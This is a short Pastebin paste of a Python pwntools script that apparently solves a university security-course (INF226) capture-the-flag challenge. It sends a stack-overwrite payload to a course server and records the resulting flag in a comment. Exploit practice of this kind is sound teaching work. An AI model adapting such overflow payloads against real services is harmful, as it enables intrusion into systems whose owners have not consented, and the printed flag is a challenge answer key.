Advertisement
Guest User

Untitled

a guest
Sep 15th, 2019
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.21 KB | None | 0 0
  1. from pwn import *
  2. connection = remote('shepherd.ii.uib.no', 9001)
  3. payload = fit({4:0x41414141, 44:0xc0cac01a})
  4. connection.sendline(payload)
  5. print(connection.recvall())
  6.  
  7. #Flag: INF226{fr33d0m_v4r14bl3_s4v3d_th3_d4y}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement